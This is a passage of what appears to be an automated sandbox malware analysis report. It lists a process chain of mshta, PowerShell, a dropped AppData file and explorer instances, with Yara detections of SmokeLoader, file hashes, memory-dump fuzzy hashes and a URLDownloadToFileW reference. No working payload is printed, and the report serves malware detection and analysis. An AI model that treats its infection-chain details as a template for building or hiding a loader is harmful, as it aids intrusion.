                                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:12:38:07
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\djvbaae
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\djvbaae
                                                                                                                                                                                                                            Imagebase:0x190000
                                                                                                                                                                                                                            File size:56'368 bytes
                                                                                                                                                                                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:12:38:08
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:12:38:09
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x8f0000
                                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:12:38:10
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:12:38:11
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x8f0000
                                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:12:38:12
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x8f0000
                                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:12:38:14
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:12:38:15
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x8f0000
                                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:12:38:16
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3484 -s 724
                                                                                                                                                                                                                            Imagebase:0x7ff6d5680000
                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                            Start time:12:38:16
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                            Start time:12:38:17
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x8f0000
                                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                            Start time:12:38:18
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Reset < >
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6840000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6840000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6840000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6840000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1933737052.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8f7552036f67c330851f73a1d9966dd4fa94ea56b06a36eadcab0a5b72db30fa
                                                                                                                                                                                                                              • Instruction ID: 3e401906f4e6aa12de8931606c61a0f248cccbd10dfef31f99a533216f19f8d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f7552036f67c330851f73a1d9966dd4fa94ea56b06a36eadcab0a5b72db30fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C222775A00219AFCB05CF98D984ADEBBB2FF88310F248559E855AB365D731ED81CF90
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7600000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: tP^q$tP^q
                                                                                                                                                                                                                              • API String ID: 0-309238000
                                                                                                                                                                                                                              • Opcode ID: 0427d77b899778f9f16ce3faf45805f7bbe906aa2c5ec92afdacb92622f6bb7d
                                                                                                                                                                                                                              • Instruction ID: 9db34cedc557842d5018c9b73bb1a476ad14ebbecb2949cdef86d1917a540079
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0427d77b899778f9f16ce3faf45805f7bbe906aa2c5ec92afdacb92622f6bb7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F85134B1B00214AFC7295A78C914B2BBFA2ABC9710F14845AE54ADF391CA71DC45C7E1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 046B51A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1933737052.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DownloadFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1407266417-0
                                                                                                                                                                                                                              • Opcode ID: b798865277727e3b6e112f15e450eb6906016bfa78ab36e6dedbe6319c9b2aea
                                                                                                                                                                                                                              • Instruction ID: ec3f463860c44e4fc6a2a73fbe8b782d4724a21bdf6b60e5d07c3d7f20ce820c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b798865277727e3b6e112f15e450eb6906016bfa78ab36e6dedbe6319c9b2aea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F72104B1D01259EFCB00CF99D984ADEFBB4FB48314F10812AE919A7310D375AA94CBA4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7600000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3e10919c06b457af901f5eaeb1ed573af1bc304dd328ed78faf3b4fc1fb5911d
                                                                                                                                                                                                                              • Instruction ID: a2d9db5346d1f03d02c65c81db512cf637a82b5e0fbbadeccef2d2789471941f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e10919c06b457af901f5eaeb1ed573af1bc304dd328ed78faf3b4fc1fb5911d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1B1A4B4B402089FCB1D9F68D914A6EBBE2FB89710F148459E9069F390DA71EC46CBD1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1933213469.0000000002E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E3D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2e3d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6c0b00e5c1acba123c9f6a3fc5e4d69be733e603e68859fe19ecd298e2d64110
                                                                                                                                                                                                                              • Instruction ID: 6305853e0bad493398720d7f2c87392448ae27e24129a815a0edf9f503b49d84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c0b00e5c1acba123c9f6a3fc5e4d69be733e603e68859fe19ecd298e2d64110
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D01526104E3C09ED7138B258C94B62BFB4DF53629F1DC0DBD8888F1A7C2695849CB72
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1933213469.0000000002E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E3D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2e3d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9042bfb5eacd70f1ddfdad6063ec4c05034a4255d8feb8b5add2318d4d1b98f9
                                                                                                                                                                                                                              • Instruction ID: c87a1e78c0072e12c17ace8d1d76a9f56005df3f0b2b498032f8bd8b95572a92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9042bfb5eacd70f1ddfdad6063ec4c05034a4255d8feb8b5add2318d4d1b98f9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32012B714483009AE7124F25CDC8767BF98DF41729F08C429EC084B246C379D841CEB1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7600000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$X=Nl$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-684221529
                                                                                                                                                                                                                              • Opcode ID: b1933274f0b8c6cca7dd5f4ca7696d59286f41f50a30b9e66001bad4f2c19581
                                                                                                                                                                                                                              • Instruction ID: 7efd1716758b0554526b71fe191a8b164dad391f7e7673e0d0e012e69f92c4da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1933274f0b8c6cca7dd5f4ca7696d59286f41f50a30b9e66001bad4f2c19581
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A851E6B17043098FD7299B78C41476BBBE1AFC6214F14856AC456CB3E5DB31D846CBE1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7600000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                                                                                              • Opcode ID: 5b1877c58f02201076adf7d98013dcb6b83f3bef4e40f16b62ecffaade6c2bb1
                                                                                                                                                                                                                              • Instruction ID: 4cef4733397521f6d5649a31e89e6fadacdfc6ac5f0ca0c51ad5af9fbeb73358
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b1877c58f02201076adf7d98013dcb6b83f3bef4e40f16b62ecffaade6c2bb1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9501B16164D3C90FD72F02381C206666FB65BC3651B1A44D7C082DF2A7C9654D4A83E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                              • API String ID: 0-1420252700
                                                                                                                                                                                                                              • Opcode ID: d37b59aa7f1e9f45892451b9b032d0bc453842b72cd76f9485e163ae09534484
                                                                                                                                                                                                                              • Instruction ID: ff7199e5adea815dd4789b6d9f932b11abedc4a174a9fb2883ee44ce765e7d2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d37b59aa7f1e9f45892451b9b032d0bc453842b72cd76f9485e163ae09534484
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 301258B1B0431A9FDF159B68881076AFBA2AFC2310F1480BBD545DF391DB32D985C7A2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ?o^
                                                                                                                                                                                                                              • API String ID: 0-3200282660
                                                                                                                                                                                                                              • Opcode ID: 3a1ddc83059f90f0d98ef0eaddec02486b1b72a9d0d25635f59a5eb2d39912d7
                                                                                                                                                                                                                              • Instruction ID: 044c52f8e359bf98a07e791023555d553cdea832b897f669ea308774945704fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a1ddc83059f90f0d98ef0eaddec02486b1b72a9d0d25635f59a5eb2d39912d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E518130A0A3E15FC707DB6DD864599BFB4EF47200B0940DBC494DF2A3C624E849C7A6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05acfa09be592331026d2109790798a9c22c32bfa8dbb9b5cee11a7adec131d7
                                                                                                                                                                                                                              • Instruction ID: 78de8872ac0b2031b2123614ce7fffb4f3d7084ac8f2bfca3ed870cea0b73baf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05acfa09be592331026d2109790798a9c22c32bfa8dbb9b5cee11a7adec131d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40916BB0A006458FCB15CF9DC5949BAFBB1FF49310B248AA9D815AB365C736FC51CBA0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 269c5a2306b8183d34d04be975dc76984c799e8a991c93a9f9f9ad31330a2f64
                                                                                                                                                                                                                              • Instruction ID: 9592f5a7c9b02a71c0589bb16d8a82d7242a1143756c671bf7ae90cf22e71be1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 269c5a2306b8183d34d04be975dc76984c799e8a991c93a9f9f9ad31330a2f64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A41D5F4A0430BCFDF158B658900A6AFBB2AF85254F5881B6D504DF251C732CA85CBA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b15c23a263338b60f3d8bcf32acc26bd6d96426eb5b1125ce9d67086d858b3d1
                                                                                                                                                                                                                              • Instruction ID: 1b81a7b31f86bec78e39cb6dea51182956a84eeb8c4909edbf57138d4266b4dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15c23a263338b60f3d8bcf32acc26bd6d96426eb5b1125ce9d67086d858b3d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA415AB4A106458FCB06CF58C5A89BAFBB1FF49310B1585A9D815AB364C736FC51CFA0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 69fb91103b5d098eb1dd495e6f085bb1d558d56b3ca80c52805b32cd00f74131
                                                                                                                                                                                                                              • Instruction ID: 4452265df801de2f6ad94a98c29fcbefd3d288d185c4aeddeb3eef69b4348370
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69fb91103b5d098eb1dd495e6f085bb1d558d56b3ca80c52805b32cd00f74131
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63211A74A002598FCB05DF99D5909AEFBB5FF8A310B148499D819AB361C731EC49CBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1823299254.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_35cd000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
